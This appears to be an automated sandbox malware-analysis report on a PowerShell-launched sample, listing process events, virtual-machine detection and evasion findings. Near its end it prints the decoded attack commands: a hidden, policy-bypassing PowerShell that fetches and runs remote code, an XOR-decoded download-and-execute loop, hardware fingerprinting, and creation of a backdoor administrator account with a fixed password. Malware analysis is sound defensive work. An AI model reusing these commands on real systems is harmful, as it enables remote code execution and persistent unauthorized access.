      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXEJump to behavior

      Malware Analysis System Evasion

      barindex
      Queries memory information (via WMI often done to detect virtual machines)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDrive
      Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory
      Source: C:\Windows\Temp\svczHost.exeMemory allocated: 15B5B900000 memory reserve | memory write watch
      Source: C:\Windows\Temp\myRdpService.exeMemory allocated: 2DE23AB0000 memory reserve | memory write watch
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9888Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9878Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9918Jump to behavior
      Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 414
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9881
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9865
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9868
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\p0kqociu\p0kqociu.dllJump to dropped file
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8556Thread sleep count: 9878 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8616Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8616Thread sleep time: -900000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5768Thread sleep count: 9881 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5212Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4932Thread sleep count: 9865 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7924Thread sleep count: 9868 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\net1.exeLast function: Thread delayed
      Source: C:\Windows\Temp\myRdpService.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 900000Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: powershell.exe, 0000000B.00000002.3383100273.000001F1C50FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
      Source: powershell.exe, 0000000B.00000002.3383100273.000001F1C50FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
      Source: powershell.exe, 0000000B.00000002.3715659309.000001F1D4DAD000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000013.00000000.3353970114.00007FF7810CA000.00000002.00000001.01000000.00000009.sdmp, svczHost.exe, 00000013.00000002.4248447361.0000015B5FB46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 0000002C.00000002.4251536366.00007FF6E060C000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
      Source: powershell.exe, 00000002.00000002.3190743931.000001B436F25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllernet 2Intel(R) Ethernet Connection (7) I219-LM{68C65ED0-D5FC-471F-BF0F-95C04D2E3B08}879-4C9B-BB
      Source: powershell.exe, 0000000B.00000002.3383100273.000001F1C50FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
      Source: myRdpService.exe, 0000002C.00000002.4246218378.000002DE23B6F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll@
      Source: powershell.exe, 00000007.00000002.3051426177.00000140750BD000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.3868682258.000001F1DC841000.00000004.00000020.00020000.00000000.sdmp, svczHost.exe, 00000013.00000002.4246024883.0000015B5B701000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.3763240045.0000021EF6A35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
      Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
      Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
      Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
      Source: C:\Windows\System32\sppsvc.exeProcess queried: DebugPort
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\Temp\svczHost.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Windows\Temp\myRdpService.exeProcess token adjusted: Debug
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Bypasses PowerShell execution policy
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PoWERShElL -W HIDDeN -noLoGO -NoP -Ep bYPass -EnCodeDComMaNd "SQBFAFgAIAAoAFsAVABFAHgAVAAuAEUATgBjAE8AZABpAG4ARwBdADoAOgBVAFQARgA4AC4ARwBFAFQAUwBUAFIASQBOAGcAKAAoAGkAVwByACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIAYQBIAFIAMABjAEgATQA2AEwAeQA5ADEAZQBYAFEAeABiAGoAaABrAFoAVwBRADUAWgBtAEkAegBPAEQAQQB1AFkAMgA5AHQATAAyAGwAcQAiACkAKQApACkALgBDAE8AbgB0AGUAbgB0ACkAKQA="
      Encrypted powershell cmdline option found
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX ([TExT.ENcOdinG]::UTF8.GETSTRINg((iWr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly91eXQxbjhkZWQ5ZmIzODAuY29tL2lq")))).COntent))
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $uri = "https://uyt1n8ded9fb380.com/file2/a931528c26e1c78e87bafbbfbe7cd3d2eb625e6900c36f7e4b647edf6907702d6ae2fd22a4c9df957a8baa93a3c2a28c32ca33006baf539531f41da4e7fb4444fad35468db56a2b85e5680303c8dab5f8b4923406be2a3216aa7480a3d270cd89a984610d77ede5fd7c761f22cd178c7";$count = 100;function Send { param( [PSObject] $logMsg ) # Convert body to string $stringBody = [string]($logMsg | ConvertTo-Json); $logMessages = @(); $logMessages += $stringBody; $logMessages += "----------"; $headers = @{}; $key = "Content-Type"; $value = "application/json"; $headers[$key] = $value; $uri = "LOGURL"; try { $body = $logMessages | ConvertTo-Json; Invoke-WebRequest -Uri $uri -Method Post -Headers $headers -Body $body } catch{ } }while($count -gt 0){try{ Send "begin download $uri";$content = Invoke-WebRequest -Uri $uri -UseBasicParsing; $byteArray = $content.content; for ($i = 0; $i -lt $byteArray.Length; $i++) { $byteArray[$i] = $byteArray[$i] -bxor 1; }Invoke-Expression ([System.Text.Encoding]::UTF8.GetString($byteArray));break;}catch{Send $_.Exception.Message;$count -= 1;Start-Sleep -s 15;}}
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded function Get-Identity{ $hardDrives = Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.MediaType -eq "Fixed hard disk media" -or $_.MediaType -eq "Fixed hard disk media - SSD" }$driveInfoArray = @()foreach ($hardDrive in $hardDrives) { $serialNumber = $hardDrive.SerialNumber $model = $hardDrive.Model $driveInfo = "Serial Number: $serialNumber, Model: $model" $driveInfoArray += $driveInfo}$combinedInfo = $driveInfoArray -join "`r`n"$cpuInfo = Get-WmiObject -Class Win32_Processor$cpuDetails = "ProcessorId: $($cpuInfo.ProcessorId), Name: $($cpuInfo.Name), MaxClockSpeed: $($cpuInfo.MaxClockSpeed), UniqueId: $($cpuInfo.UniqueId)"$allInfo = "$combinedInfo`r`n$cpuDetails"$md5 = New-Object System.Security.Cryptography.MD5CryptoServiceProvider$bytes = [System.Text.Encoding]::UTF8.GetBytes($allInfo)$hashBytes = $md5.ComputeHash($bytes)$hash = [BitConverter]::ToString($hashBytes) -replace '-' return $hash;}cd "C:\Windows\Temp";$test = Get-Identity;$test | Out-File -FilePath "deviceId.txt" -Encoding UTF8
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded $Username = "User1";$pwd = "123456789!A1a"; $UserParams = @{'Name' = $Username; 'Password' = (ConvertTo-SecureString -String $pwd -AsPlainText -Force); 'PasswordNeverExpires' = $true};New-LocalUser @UserParams;$GroupParams = @{'Group' = 'Administrators'; 'Member' = $Username};Add-LocalGroupMember @GroupParams;
      Source: C:\Windows\Temp\svczHost.exeProcess created: Base64 decoded get-service "myRdpService"
      Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded IEX ([TExT.ENcOdinG]::UTF8.GETSTRINg((iWr ([System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("aHR0cHM6Ly91eXQxbjhkZWQ5ZmIzODAuY29tL2lq")))).COntent))Jump to behavior
